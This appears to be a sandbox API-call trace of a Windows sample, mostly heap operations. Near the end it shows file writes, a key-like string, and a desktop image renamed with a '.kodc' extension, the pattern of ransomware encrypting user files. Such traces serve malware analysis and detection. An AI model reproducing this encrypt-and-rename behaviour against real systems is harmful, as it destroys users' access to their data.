[0100.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ef0 [0100.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.893] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0100.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ed8 | out: hHeap=0x630000) returned 1 [0100.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ef0 | out: hHeap=0x630000) returned 1 [0100.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0100.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7ef0 [0100.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7ed8 [0100.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0100.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0100.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0100.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ef0 | out: hHeap=0x630000) returned 1 [0100.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ed8 | out: hHeap=0x630000) returned 1 [0100.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0100.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.894] GetCurrentThreadId () returned 0x42c [0100.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba78e8 [0100.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0100.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.894] GetCurrentThreadId () returned 0x42c [0100.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0100.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ed8 [0100.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0100.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ef0 [0100.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ec0 [0100.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7f08 [0100.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79c8 [0100.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0100.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ed8 | out: hHeap=0x630000) returned 1 [0100.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ed8 [0100.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0100.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ed8 | out: hHeap=0x630000) returned 1 [0100.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f08 | out: hHeap=0x630000) returned 1 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ef0 | out: hHeap=0x630000) returned 1 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ec0 | out: hHeap=0x630000) returned 1 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ea8 | out: hHeap=0x630000) returned 1 [0100.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb5c08 | out: hHeap=0x630000) returned 1 [0100.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0100.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.898] WriteFile (in: hFile=0x5cc, lpBuffer=0x9bb8968*, nNumberOfBytesToWrite=0x148a3, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9bb8968*, lpNumberOfBytesWritten=0x9e2fb14*=0x148a3, lpOverlapped=0x0) returned 1 [0100.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8968 | out: hHeap=0x630000) returned 1 [0100.898] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x148a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.898] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0100.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0100.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0100.899] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.899] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.899] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.899] CloseHandle (hObject=0x5cc) returned 1 [0100.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0100.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0100.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0100.901] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NcPu25RMbC\\LSUYyXvsq.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ncpu25rmbc\\lsuyyxvsq.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NcPu25RMbC\\LSUYyXvsq.png.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ncpu25rmbc\\lsuyyxvsq.png.kodc")) returned 1 [0100.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.902] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0100.903] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cb5eab0, ftCreationTime.dwHighDateTime=0x1d5b917, ftLastAccessTime.dwLowDateTime=0x24543a50, ftLastAccessTime.dwHighDateTime=0x1d5c399, ftLastWriteTime.dwLowDateTime=0x24543a50, ftLastWriteTime.dwHighDateTime=0x1d5c399, nFileSizeHigh=0x0, nFileSizeLow=0x148a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LSUYyXvsq.png", cAlternateFileName="LSUYYX~1.PNG")) returned 0 [0100.903] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0100.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0100.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332dc90 | out: hHeap=0x630000) returned 1 [0100.903] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0100.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0100.903] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0100.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0100.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0100.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0100.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0100.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 